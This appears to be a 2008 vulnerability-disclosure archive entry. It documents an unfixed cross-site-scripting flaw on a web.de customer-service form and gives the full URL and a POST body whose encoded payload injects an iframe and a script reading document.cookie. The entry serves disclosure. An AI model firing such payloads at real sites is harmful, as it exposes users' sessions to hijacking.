Security researcher mox, has submitted on 28/04/2008 a cross-site-scripting (XSS) vulnerability affecting www2.kundenservice.web.de, which at the time of submission ranked 149 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 20/06/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 28/04/2008 |
Date published: 20/06/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: mox |
Domain: www2.kundenservice.web.de |
Category: XSS |
Pagerank: 149 |
URL: https://www2.kundenservice.web.de/Angebote/FreeMail/Klassen/Abuse/Anmeldung/Spamcops_Anmeldung/?si=8 3Ezl.1jQAhz.3l5Xev.2H* |
POST: si=83Ezl.1jQAhz.3l5Xev.2H*&source=&mail=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fgoogle.com%3E%3C%2Fiframe %3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&subject=&auswahl1=&auswahl2=&auswahl3=&a uswahl4=68.84.60.241&body=&cc=kopie&action=Abschicken |
Click here to view the mirror
|
|
|